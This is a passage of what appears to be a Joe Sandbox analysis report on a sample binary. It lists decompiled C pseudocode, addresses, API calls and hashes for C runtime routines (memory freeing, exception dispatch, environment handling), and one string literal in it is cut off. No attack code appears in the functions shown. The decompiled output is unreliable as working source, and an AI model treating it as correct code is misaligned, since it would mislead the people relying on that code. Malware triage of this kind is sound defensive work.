                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408D00
                                                                                              • Part of subcall function 00408C1D: _free.LIBCMT ref: 00408D12
                                                                                            • _free.LIBCMT ref: 004090C7
                                                                                              • Part of subcall function 00406FE2: HeapFree.KERNEL32(00000000,00000000,?,00408DAE,?,00000000,?,?,?,00408DD5,?,00000007,?,?,00409225,?), ref: 00406FF8
                                                                                              • Part of subcall function 00406FE2: GetLastError.KERNEL32(?,?,00408DAE,?,00000000,?,?,?,00408DD5,?,00000007,?,?,00409225,?,?), ref: 0040700A
                                                                                            • _free.LIBCMT ref: 004090E9
                                                                                            • _free.LIBCMT ref: 004090FE
                                                                                            • _free.LIBCMT ref: 00409109
                                                                                            • _free.LIBCMT ref: 0040912B
                                                                                            • _free.LIBCMT ref: 0040913E
                                                                                            • _free.LIBCMT ref: 0040914C
                                                                                            • _free.LIBCMT ref: 00409157
                                                                                            • _free.LIBCMT ref: 0040918F
                                                                                            • _free.LIBCMT ref: 00409196
                                                                                            • _free.LIBCMT ref: 004091B3
                                                                                            • _free.LIBCMT ref: 004091CB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                            • String ID:
                                                                                            • API String ID: 161543041-0
                                                                                            • Opcode ID: 34d98a1d7baa9e5e37b10f72cfdd63d5c6bc88549218be5d7f00dea3a494757e
                                                                                            • Instruction ID: 7669017e686b7b531bc8007684876c82e84697ab4afaaf0de19a3c0836fef4f1
                                                                                            • Opcode Fuzzy Hash: 34d98a1d7baa9e5e37b10f72cfdd63d5c6bc88549218be5d7f00dea3a494757e
                                                                                            • Instruction Fuzzy Hash: CA3110316042029FEB216A39D845B5777E9AF40314F25843FE059EB2D2DF78ED90CB18
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00405388 Relevance: 15.1, APIs: 10, Instructions: 69COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 77%
                                                                                            			E00405388(void* __ebx, void* __edi, void* __esi, char _a4) {
				void* _v5;
				char _v12;
				char _v16;
				char _v20;
				void* __ebp;
				char _t55;
				char _t61;
				void* _t67;
				intOrPtr _t68;
				void* _t72;
				void* _t73;

				_t73 = __esi;
				_t72 = __edi;
				_t67 = __ebx;
				_t36 = _a4;
				_t68 =  *_a4;
				_t77 = _t68 - 0x410dc8;
				if(_t68 != 0x410dc8) {
					E00406FE2(_t68);
					_t36 = _a4;
				}
				E00406FE2( *((intOrPtr*)(_t36 + 0x3c)));
				E00406FE2( *((intOrPtr*)(_a4 + 0x30)));
				E00406FE2( *((intOrPtr*)(_a4 + 0x34)));
				E00406FE2( *((intOrPtr*)(_a4 + 0x38)));
				E00406FE2( *((intOrPtr*)(_a4 + 0x28)));
				E00406FE2( *((intOrPtr*)(_a4 + 0x2c)));
				E00406FE2( *((intOrPtr*)(_a4 + 0x40)));
				E00406FE2( *((intOrPtr*)(_a4 + 0x44)));
				E00406FE2( *((intOrPtr*)(_a4 + 0x360)));
				_v16 =  &_a4;
				_t55 = 5;
				_v12 = _t55;
				_v20 = _t55;
				_push( &_v12);
				_push( &_v16);
				_push( &_v20);
				E004051B4(_t67, _t72, _t73, _t77);
				_v16 =  &_a4;
				_t61 = 4;
				_v20 = _t61;
				_v12 = _t61;
				_push( &_v20);
				_push( &_v16);
				_push( &_v12);
				return E0040521F(_t67, _t72, _t73, _t77);
			}














                                                                                            0x00405388
                                                                                            0x00405388
                                                                                            0x00405388
                                                                                            0x0040538d
                                                                                            0x00405393
                                                                                            0x00405395
                                                                                            0x0040539b
                                                                                            0x0040539e
                                                                                            0x004053a3
                                                                                            0x004053a6
                                                                                            0x004053aa
                                                                                            0x004053b5
                                                                                            0x004053c0
                                                                                            0x004053cb
                                                                                            0x004053d6
                                                                                            0x004053e1
                                                                                            0x004053ec
                                                                                            0x004053f7
                                                                                            0x00405405
                                                                                            0x00405410
                                                                                            0x00405418
                                                                                            0x00405419
                                                                                            0x0040541c
                                                                                            0x00405422
                                                                                            0x00405426
                                                                                            0x0040542a
                                                                                            0x0040542b
                                                                                            0x00405435
                                                                                            0x0040543b
                                                                                            0x0040543c
                                                                                            0x0040543f
                                                                                            0x00405445
                                                                                            0x00405449
                                                                                            0x0040544d
                                                                                            0x00405454

                                                                                            APIs
                                                                                            • _free.LIBCMT ref: 0040539E
                                                                                              • Part of subcall function 00406FE2: HeapFree.KERNEL32(00000000,00000000,?,00408DAE,?,00000000,?,?,?,00408DD5,?,00000007,?,?,00409225,?), ref: 00406FF8
                                                                                              • Part of subcall function 00406FE2: GetLastError.KERNEL32(?,?,00408DAE,?,00000000,?,?,?,00408DD5,?,00000007,?,?,00409225,?,?), ref: 0040700A
                                                                                            • _free.LIBCMT ref: 004053AA
                                                                                            • _free.LIBCMT ref: 004053B5
                                                                                            • _free.LIBCMT ref: 004053C0
                                                                                            • _free.LIBCMT ref: 004053CB
                                                                                            • _free.LIBCMT ref: 004053D6
                                                                                            • _free.LIBCMT ref: 004053E1
                                                                                            • _free.LIBCMT ref: 004053EC
                                                                                            • _free.LIBCMT ref: 004053F7
                                                                                            • _free.LIBCMT ref: 00405405
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: _free$ErrorFreeHeapLast
                                                                                            • String ID:
                                                                                            • API String ID: 776569668-0
                                                                                            • Opcode ID: 0673a1b250a9dec0bdf84d283b199b5294cbaba2f62aa41ba3dec7c10a252565
                                                                                            • Instruction ID: 914f36d56776c57f76c0263ab5734211ec497dabdcb6bfd6fe0f9e5bb6d2e2af
                                                                                            • Opcode Fuzzy Hash: 0673a1b250a9dec0bdf84d283b199b5294cbaba2f62aa41ba3dec7c10a252565
                                                                                            • Instruction Fuzzy Hash: F121C576900109AFCB01EF95D881DDE7FB8FF08344B1181AAB616AB161EB35EB54CF84
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 00401F50 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 120COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 68%
                                                                                            			E00401F50(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _t52;
				signed int _t59;
				intOrPtr _t60;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr _t64;
				intOrPtr _t66;
				intOrPtr _t67;
				intOrPtr _t72;
				intOrPtr* _t76;
				intOrPtr _t77;
				signed int _t81;
				char _t83;
				intOrPtr _t86;
				intOrPtr _t93;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t102;
				void* _t104;
				void* _t111;

				_t89 = __edx;
				_t76 = _a4;
				_push(__edi);
				_v5 = 0;
				_v16 = 1;
				 *_t76 = E0040F020(__ecx,  *_t76);
				_t77 = _a8;
				_t6 = _t77 + 0x10; // 0x11
				_t96 = _t6;
				_push(_t96);
				_v20 = _t96;
				_v12 =  *(_t77 + 8) ^  *0x417094;
				E00401F10(_t77, __edx, __edi, _t96,  *(_t77 + 8) ^  *0x417094);
				E00402367(_a12);
				_t52 = _a4;
				_t104 = _t102 - 0x1c + 0x10;
				_t93 =  *((intOrPtr*)(_t77 + 0xc));
				if(( *(_t52 + 4) & 0x00000066) != 0) {
					__eflags = _t93 - 0xfffffffe;
					if(_t93 != 0xfffffffe) {
						_t89 = 0xfffffffe;
						E00402350(_t77, 0xfffffffe, _t96, 0x417094);
						goto L13;
					}
					goto L14;
				} else {
					_v32 = _t52;
					_v28 = _a12;
					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
					if(_t93 == 0xfffffffe) {
						L14:
						return _v16;
					} else {
						do {
							_t81 = _v12;
							_t59 = _t93 + (_t93 + 2) * 2;
							_t77 =  *((intOrPtr*)(_t81 + _t59 * 4));
							_t60 = _t81 + _t59 * 4;
							_t82 =  *((intOrPtr*)(_t60 + 4));
							_v24 = _t60;
							if( *((intOrPtr*)(_t60 + 4)) == 0) {
								_t83 = _v5;
								goto L7;
							} else {
								_t89 = _t96;
								_t61 = E004022F0(_t82, _t96);
								_t83 = 1;
								_v5 = 1;
								_t111 = _t61;
								if(_t111 < 0) {
									_v16 = 0;
									L13:
									_push(_t96);
									E00401F10(_t77, _t89, _t93, _t96, _v12);
									goto L14;
								} else {
									if(_t111 > 0) {
										_t62 = _a4;
										__eflags =  *_t62 - 0xe06d7363;
										if( *_t62 == 0xe06d7363) {
											__eflags =  *0x4102f4;
											if(__eflags != 0) {
												_t72 = E0040ECE0(__eflags, "\xef\xbf\												_t104 = _t104 + 4;
												__eflags = _t72;
												if(_t72 != 0) {
													_t98 =  *0x4102f4; // 0x4020e4
													 *0x410234(_a4, 1);
													 *_t98();
													_t96 = _v20;
													_t104 = _t104 + 8;
												}
												_t62 = _a4;
											}
										}
										_t90 = _t62;
										E00402330(_t62, _a8, _t62);
										_t64 = _a8;
										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t93;
										if( *((intOrPtr*)(_t64 + 0xc)) != _t93) {
											_t90 = _t93;
											E00402350(_t64, _t93, _t96, 0x417094);
											_t64 = _a8;
										}
										_push(_t96);
										 *((intOrPtr*)(_t64 + 0xc)) = _t77;
										E00401F10(_t77, _t90, _t93, _t96, _v12);
										_t86 =  *((intOrPtr*)(_v24 + 8));
										E00402310();
										asm("int3");
										_t66 = E004024A1();
										__eflags = _t66;
										if(_t66 != 0) {
											_t67 = E00402453(_t86);
											__eflags = _t67;
											if(_t67 != 0) {
												return 1;
											} else {
												E004024DD();
												goto L24;
											}
										} else {
											L24:
											__eflags = 0;
											return 0;
										}
									} else {
										goto L7;
									}
								}
							}
							goto L28;
							L7:
							_t93 = _t77;
						} while (_t77 != 0xfffffffe);
						if(_t83 != 0) {
							goto L13;
						}
						goto L14;
					}
				}
				L28:
			}






























                                                                                            0x00401f50
                                                                                            0x00401f57
                                                                                            0x00401f5b
                                                                                            0x00401f5c
                                                                                            0x00401f62
                                                                                            0x00401f6e
                                                                                            0x00401f70
                                                                                            0x00401f76
                                                                                            0x00401f76
                                                                                            0x00401f7f
                                                                                            0x00401f81
                                                                                            0x00401f84
                                                                                            0x00401f87
                                                                                            0x00401f8f
                                                                                            0x00401f94
                                                                                            0x00401f97
                                                                                            0x00401f9a
                                                                                            0x00401fa1
                                                                                            0x00401ffd
                                                                                            0x00402000
                                                                                            0x00402008
                                                                                            0x0040200f
                                                                                            0x00000000
                                                                                            0x0040200f
                                                                                            0x00000000
                                                                                            0x00401fa3
                                                                                            0x00401fa3
                                                                                            0x00401fa9
                                                                                            0x00401faf
                                                                                            0x00401fb5
                                                                                            0x00402020
                                                                                            0x00402029
                                                                                            0x00401fb7
                                                                                            0x00401fb7
                                                                                            0x00401fb7
                                                                                            0x00401fbd
                                                                                            0x00401fc0
                                                                                            0x00401fc3
                                                                                            0x00401fc6
                                                                                            0x00401fc9
                                                                                            0x00401fce
                                                                                            0x00401fe4
                                                                                            0x00000000
                                                                                            0x00401fd0
                                                                                            0x00401fd0
                                                                                            0x00401fd2
                                                                                            0x00401fd7
                                                                                            0x00401fd9
                                                                                            0x00401fdc
                                                                                            0x00401fde
                                                                                            0x00401ff4
                                                                                            0x00402014
                                                                                            0x00402014
                                                                                            0x00402018
                                                                                            0x00000000
                                                                                            0x00401fe0
                                                                                            0x00401fe0
                                                                                            0x0040202a
                                                                                            0x0040202d
                                                                                            0x00402033
                                                                                            0x00402035
                                                                                            0x0040203c
                                                                                            0x00402043
                                                                                            0x00402048
                                                                                            0x0040204b
                                                                                            0x0040204d
                                                                                            0x0040204f
                                                                                            0x0040205c
                                                                                            0x00402062
                                                                                            0x00402064
                                                                                            0x00402067
                                                                                            0x00402067
                                                                                            0x0040206a
                                                                                            0x0040206a
                                                                                            0x0040203c
                                                                                            0x00402070
                                                                                            0x00402072
                                                                                            0x00402077
                                                                                            0x0040207a
                                                                                            0x0040207d
                                                                                            0x00402085
                                                                                            0x00402089
                                                                                            0x0040208e
                                                                                            0x0040208e
                                                                                            0x00402091
                                                                                            0x00402095
                                                                                            0x00402098
                                                                                            0x004020a5
                                                                                            0x004020a8
                                                                                            0x004020ad
                                                                                            0x004020ae
                                                                                            0x004020b3
                                                                                            0x004020b5
                                                                                            0x004020ba
                                                                                            0x004020bf
                                                                                            0x004020c1
                                                                                            0x004020cc
                                                                                            0x004020c3
                                                                                            0x004020c3
                                                                                            0x00000000
                                                                                            0x004020c3
                                                                                            0x004020b7
                                                                                            0x004020b7
                                                                                            0x004020b7
                                                                                            0x004020b9
                                                                                            0x004020b9
                                                                                            0x00401fe2
                                                                                            0x00000000
                                                                                            0x00401fe2
                                                                                            0x00401fe0
                                                                                            0x00401fde
                                                                                            0x00000000
                                                                                            0x00401fe7
                                                                                            0x00401fe7
                                                                                            0x00401fe9
                                                                                            0x00401ff0
                                                                                            0x00000000
                                                                                            0x00401ff2
                                                                                            0x00000000
                                                                                            0x00401ff0
                                                                                            0x00401fb5
                                                                                            0x00000000

                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00401F87
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 00401F8F
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00402018
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 00402043
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 00402098
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.265136252.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.265130355.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265150572.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.265160870.0000000000417000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_gkvlc.jbxd
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm$ @
                                                                                            • API String ID: 1170836740-2437752423
                                                                                            • Opcode ID: 1a7e26ab05d1015724e1ab621481afa0cbad5190bdcf633b75fe1d81258bdb62
                                                                                            • Instruction ID: 6232bfd01d822aa2b54577f6f48bbad3b00caa584d5b097a132098dd8fb50226
                                                                                            • Opcode Fuzzy Hash: 1a7e26ab05d1015724e1ab621481afa0cbad5190bdcf633b75fe1d81258bdb62
                                                                                            • Instruction Fuzzy Hash: 7441C830A003059BCF10DF69C948A9E7BB5AF44318F14807BF9187B3D2D7B99A45CB94
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 004083B0 Relevance: 12.2, APIs: 8, Instructions: 203COMMON
                                                                                            Download Yara Rule
                                                                                            C-Code - Quality: 87%
                                                                                            			E004083B0(signed int __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v5;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v48;
				signed int _t59;
				signed int _t62;
				signed int _t64;
				signed int _t67;
				signed int _t68;
				signed int _t71;
				signed int _t72;
				signed int _t76;
				signed int* _t78;
				signed int _t84;
				signed int _t86;
				signed int _t87;
				signed int _t91;
				intOrPtr* _t98;
				signed int _t109;
				signed int _t110;
				signed int _t111;
				intOrPtr* _t120;
				signed int _t121;
				void* _t122;
				void* _t126;
				signed int _t130;
				signed int _t138;
				signed int _t139;
				signed int _t141;
				signed int _t143;
				signed int _t146;
				signed int _t149;
				signed int _t150;
				void* _t153;
				void* _t157;
				void* _t158;
				void* _t160;
				void* _t162;

				_t110 = __ebx;
				_t153 = _t157;
				_t158 = _t157 - 0x10;
				_t146 = _a4;
				_t163 = _t146;
				if(_t146 != 0) {
					_push(__ebx);
					_t141 = _t146;
					_t59 = E0040EEF0(_t146, 0x3d);
					_v20 = _t59;
					__eflags = _t59;
					if(__eflags == 0) {
						L38:
						 *((intOrPtr*)(E0040514F(__eflags))) = 0x16;
						goto L39;
					} else {
						__eflags = _t59 - _t146;
						if(__eflags == 0) {
							goto L38;
						} else {
							_v5 =  *((intOrPtr*)(_t59 + 1));
							L60();
							_t110 = 0;
							__eflags =  *0x417e68 - _t110; // 0x7b9670
							if(__eflags != 0) {
								L14:
								_t64 =  *0x417e68; // 0x7b9670
								_v12 = _t64;
								__eflags = _t64;
								if(_t64 == 0) {
									goto L39;
								} else {
									_t67 = E004086B8(_t146, _v20 - _t146);
									_v16 = _t67;
									_t120 = _v12;
									__eflags = _t67;
									if(_t67 < 0) {
										L24:
										__eflags = _v5 - _t110;
										if(_v5 == _t110) {
											goto L40;
										} else {
											_t68 =  ~_t67;
											_v16 = _t68;
											_t30 = _t68 + 2; // 0x2
											_t139 = _t30;
											__eflags = _t139 - _t68;
											if(_t139 < _t68) {
												goto L39;
											} else {
												__eflags = _t139 - 0x3fffffff;
												if(_t139 >= 0x3fffffff) {
													goto L39;
												} else {
													_v12 = E00409852(_t120, _t139, 4);
													E00406FE2(_t110);
													_t71 = _v12;
													_t158 = _t158 + 0x10;
													__eflags = _t71;
													if(_t71 == 0) {
														goto L39;
													} else {
														_t121 = _v16;
														_t141 = _t110;
														 *(_t71 + _t121 * 4) = _t146;
														 *(_t71 + 4 + _t121 * 4) = _t110;
														goto L29;
													}
												}
											}
										}
									} else {
										__eflags =  *_t120 - _t110;
										if( *_t120 == _t110) {
											goto L24;
										} else {
											E00406FE2( *((intOrPtr*)(_t120 + _t67 * 4)));
											_t138 = _v16;
											__eflags = _v5 - _t110;
											if(_v5 != _t110) {
												_t141 = _t110;
												 *(_v12 + _t138 * 4) = _t146;
											} else {
												_t139 = _v12;
												while(1) {
													__eflags =  *((intOrPtr*)(_t139 + _t138 * 4)) - _t110;
													if( *((intOrPtr*)(_t139 + _t138 * 4)) == _t110) {
														break;
													}
													 *((intOrPtr*)(_t139 + _t138 * 4)) =  *((intOrPtr*)(_t139 + 4 + _t138 * 4));
													_t138 = _t138 + 1;
													__eflags = _t138;
												}
												_v16 = E00409852(_t139, _t138, 4);
												E00406FE2(_t110);
												_t71 = _v16;
												_t158 = _t158 + 0x10;
												__eflags = _t71;
												if(_t71 != 0) {
													L29:
													 *0x417e68 = _t71;
												}
											}
											__eflags = _a8 - _t110;
											if(_a8 == _t110) {
												goto L40;
											} else {
												_t122 = _t146 + 1;
												do {
													_t72 =  *_t146;
													_t146 = _t146 + 1;
													__eflags = _t72;
												} while (_t72 != 0);
												_v16 = _t146 - _t122 + 2;
												_t149 = E00406F85(_t146 - _t122 + 2, 1);
												_pop(_t124);
												__eflags = _t149;
												if(_t149 == 0) {
													L37:
													E00406FE2(_t149);
													goto L40;
												} else {
													_t76 = E00404D5C(_t149, _v16, _a4);
													_t160 = _t158 + 0xc;
													__eflags = _t76;
													if(__eflags != 0) {
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														_push(_t110);
														E0040507E();
														asm("int3");
														_push(_t153);
														_push(_t141);
														_t143 = _v48;
														__eflags = _t143;
														if(_t143 != 0) {
															_t126 = 0;
															_t78 = _t143;
															__eflags =  *_t143;
															if( *_t143 != 0) {
																do {
																	_t78 =  &(_t78[1]);
																	_t126 = _t126 + 1;
																	__eflags =  *_t78;
																} while ( *_t78 != 0);
															}
															_t51 = _t126 + 1; // 0x2
															_t150 = E00406F85(_t51, 4);
															_t128 = _t149;
															__eflags = _t150;
															if(_t150 == 0) {
																L58:
																E00404DB6(_t110, _t128, _t139, _t150);
																goto L59;
															} else {
																_t130 =  *_t143;
																__eflags = _t130;
																if(_t130 == 0) {
																	L57:
																	E00406FE2(0);
																	_t86 = _t150;
																	goto L45;
																} else {
																	_push(_t110);
																	_t110 = _t150 - _t143;
																	__eflags = _t110;
																	do {
																		_t52 = _t130 + 1; // 0x5
																		_t139 = _t52;
																		do {
																			_t87 =  *_t130;
																			_t130 = _t130 + 1;
																			__eflags = _t87;
																		} while (_t87 != 0);
																		_t53 = _t130 - _t139 + 1; // 0x6
																		_v12 = _t53;
																		 *(_t110 + _t143) = E00406F85(_t53, 1);
																		E00406FE2(0);
																		_t162 = _t160 + 0xc;
																		__eflags =  *(_t110 + _t143);
																		if( *(_t110 + _t143) == 0) {
																			goto L58;
																		} else {
																			_t91 = E00404D5C( *(_t110 + _t143), _v12,  *_t143);
																			_t160 = _t162 + 0xc;
																			__eflags = _t91;
																			if(_t91 != 0) {
																				L59:
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				_push(0);
																				E0040507E();
																				asm("int3");
																				_t84 =  *0x417e68; // 0x7b9670
																				__eflags = _t84 -  *0x417e74; // 0x7b9670
																				if(__eflags == 0) {
																					_push(_t84);
																					L43();
																					 *0x417e68 = _t84;
																					return _t84;
																				}
																				return _t84;
																			} else {
																				goto L55;
																			}
																		}
																		goto L63;
																		L55:
																		_t143 = _t143 + 4;
																		_t130 =  *_t143;
																		__eflags = _t130;
																	} while (_t130 != 0);
																	goto L57;
																}
															}
														} else {
															_t86 = 0;
															__eflags = 0;
															L45:
															return _t86;
														}
													} else {
														asm("sbb eax, eax");
														 *(_v20 + 1 + _t149 - _a4 - 1) = _t110;
														__eflags = E0040C447(_v20 + 1 + _t149 - _a4, _t139, __eflags, _t149,  ~_v5 & _v20 + 0x00000001 + _t149 - _a4);
														if(__eflags == 0) {
															_t98 = E0040514F(__eflags);
															_t111 = _t110 | 0xffffffff;
															__eflags = _t111;
															 *_t98 = 0x2a;
														}
														goto L37;
													}
												}
											}
										}
									}
								}
							} else {
								__eflags = _a8;
								if(_a8 == 0) {
									L9:
									__eflags = _v5 - _t110;
									if(_v5 != _t110) {
										 *0x417e68 = E00406F85(1, 4);
										E00406FE2(_t110);
										_t158 = _t158 + 0xc;
										__eflags =  *0x417e68 - _t110; // 0x7b9670
										if(__eflags == 0) {
											L39:
											_t111 = _t110 | 0xffffffff;
											__eflags = _t111;
											goto L40;
										} else {
											__eflags =  *0x417e6c - _t110; // 0x0
											if(__eflags != 0) {
												goto L14;
											} else {
												 *0x417e6c = E00406F85(1, 4);
												E00406FE2(_t110);
												_t158 = _t158 + 0xc;
												__eflags =  *0x417e6c - _t110; // 0x0
												if(__eflags == 0) {
													goto L39;
												} else {
													goto L14;
												}
											}
										}
									} else {
										_t111 = 0;
										L40:
										E00406FE2(_t141);
										_t62 = _t111;
										goto L41;
									}
								} else {
									__eflags =  *0x417e6c - _t110; // 0x0
									if(__eflags == 0) {
										goto L9;
									} else {
										__eflags = L004041B8();
										if(__eflags == 0) {
											goto L38;
										} else {
											L60();
											goto L14;
										}
									}
								}
							}
						}
					}
				} else {
					_t109 = E0040514F(_t163);
					 *_t109 = 0x16;
					_t62 = _t109 | 0xffffffff;
					L41:
					return _t62;
				}
				L63:
			}










































                                                                                            0x004083b0
                                                                                            0x004083b3
                                                                                            0x004083b5
                                                                                            0x004083b9
                                                                                            0x004083bc
                                                                                            0x004083be
                                                                                            0x004083d3
                                                                                            0x004083d8
                                                                                            0x004083da
                                                                                            0x004083df
                                                                                            0x004083e4
                                                                                            0x004083e6
                                                                                            0x004085c7
                                                                                            0x004085cc
                                                                                            0x00000000
                                                                                            0x004083ec
                                                                                            0x004083ec
                                                                                            0x004083ee
                                                                                            0x00000000
                                                                                            0x004083f4
                                                                                            0x004083f7
                                                                                            0x004083fa
                                                                                            0x004083ff
                                                                                            0x00408401
                                                                                            0x00408407
                                                                                            0x00408484
                                                                                            0x00408484
                                                                                            0x00408489
                                                                                            0x0040848c
                                                                                            0x0040848e
                                                                                            0x00000000
                                                                                            0x00408494
                                                                                            0x0040849b
                                                                                            0x004084a0
                                                                                            0x004084a5
                                                                                            0x004084a8
                                                                                            0x004084aa
                                                                                            0x004084fb
                                                                                            0x004084fb
                                                                                            0x004084fe
                                                                                            0x00000000
                                                                                            0x00408504
                                                                                            0x00408504
                                                                                            0x00408506
                                                                                            0x00408509
                                                                                            0x00408509
                                                                                            0x0040850c
                                                                                            0x0040850e
                                                                                            0x00000000
                                                                                            0x00408514
                                                                                            0x00408514
                                                                                            0x0040851a
                                                                                            0x00000000
                                                                                            0x00408520
                                                                                            0x0040852a
                                                                                            0x0040852d
                                                                                            0x00408532
                                                                                            0x00408535
                                                                                            0x00408538
                                                                                            0x0040853a
                                                                                            0x00000000
                                                                                            0x00408540
                                                                                            0x00408540
                                                                                            0x00408543
                                                                                            0x00408545
                                                                                            0x00408548
                                                                                            0x00000000
                                                                                            0x00408548
                                                                                            0x0040853a
                                                                                            0x0040851a
                                                                                            0x0040850e
                                                                                            0x004084ac
                                                                                            0x004084ac
                                                                                            0x004084ae
                                                                                            0x00000000
                                                                                            0x004084b0
                                                                                            0x004084b3
                                                                                            0x004084b9
                                                                                            0x004084bc
                                                                                            0x004084bf
                                                                                            0x004084f4
                                                                                            0x004084f6
                                                                                            0x004084c1
                                                                                            0x004084c1
                                                                                            0x004084ce
                                                                                            0x004084ce
                                                                                            0x004084d1
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x004084ca
                                                                                            0x004084cd
                                                                                            0x004084cd
                                                                                            0x004084cd
                                                                                            0x004084dd
                                                                                            0x004084e0
                                                                                            0x004084e5
                                                                                            0x004084e8
                                                                                            0x004084eb
                                                                                            0x004084ed
                                                                                            0x0040854c
                                                                                            0x0040854c
                                                                                            0x0040854c
                                                                                            0x004084ed
                                                                                            0x00408551
                                                                                            0x00408554
                                                                                            0x00000000
                                                                                            0x00408556
                                                                                            0x00408556
                                                                                            0x00408559
                                                                                            0x00408559
                                                                                            0x0040855b
                                                                                            0x0040855c
                                                                                            0x0040855c
                                                                                            0x00408568
                                                                                            0x00408570
                                                                                            0x00408573
                                                                                            0x00408574
                                                                                            0x00408576
                                                                                            0x004085be
                                                                                            0x004085bf
                                                                                            0x00000000
                                                                                            0x00408578
                                                                                            0x0040857f
                                                                                            0x00408584
                                                                                            0x00408587
                                                                                            0x00408589
                                                                                            0x004085e3
                                                                                            0x004085e4
                                                                                            0x004085e5
                                                                                            0x004085e6
                                                                                            0x004085e7
                                                                                            0x004085e8
                                                                                            0x004085ed
                                                                                            0x004085f0
                                                                                            0x004085f4
                                                                                            0x004085f5
                                                                                            0x004085f8
                                                                                            0x004085fa
                                                                                            0x00408601
                                                                                            0x00408603
                                                                                            0x00408605
                                                                                            0x00408607
                                                                                            0x00408609
                                                                                            0x00408609
                                                                                            0x0040860c
                                                                                            0x0040860d
                                                                                            0x0040860d
                                                                                            0x00408609
                                                                                            0x00408613
                                                                                            0x0040861e
                                                                                            0x00408621
                                                                                            0x00408622
                                                                                            0x00408624
                                                                                            0x0040868c
                                                                                            0x0040868c
                                                                                            0x00000000
                                                                                            0x00408626
                                                                                            0x00408626
                                                                                            0x00408628
                                                                                            0x0040862a
                                                                                            0x0040867c
                                                                                            0x0040867e
                                                                                            0x00408684
                                                                                            0x00000000
                                                                                            0x0040862c
                                                                                            0x0040862c
                                                                                            0x0040862f
                                                                                            0x0040862f
                                                                                            0x00408631
                                                                                            0x00408631
                                                                                            0x00408631
                                                                                            0x00408634
                                                                                            0x00408634
                                                                                            0x00408636
                                                                                            0x00408637
                                                                                            0x00408637
                                                                                            0x0040863f
                                                                                            0x00408643
                                                                                            0x0040864d
                                                                                            0x00408650
                                                                                            0x00408655
                                                                                            0x00408658
                                                                                            0x0040865c
                                                                                            0x00000000
                                                                                            0x0040865e
                                                                                            0x00408666
                                                                                            0x0040866b
                                                                                            0x0040866e
                                                                                            0x00408670
                                                                                            0x00408691
                                                                                            0x00408693
                                                                                            0x00408694
                                                                                            0x00408695
                                                                                            0x00408696
                                                                                            0x00408697
                                                                                            0x00408698
                                                                                            0x0040869d
                                                                                            0x0040869e
                                                                                            0x004086a3
                                                                                            0x004086a9
                                                                                            0x004086ab
                                                                                            0x004086ac
                                                                                            0x004086b2
                                                                                            0x00000000
                                                                                            0x004086b2
                                                                                            0x004086b7
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00408670
                                                                                            0x00000000
                                                                                            0x00408672
                                                                                            0x00408672
                                                                                            0x00408675
                                                                                            0x00408677
                                                                                            0x00408677
                                                                                            0x00000000
                                                                                            0x0040867b
                                                                                            0x0040862a
                                                                                            0x004085fc
                                                                                            0x004085fc
                                                                                            0x004085fc
                                                                                            0x004085fe
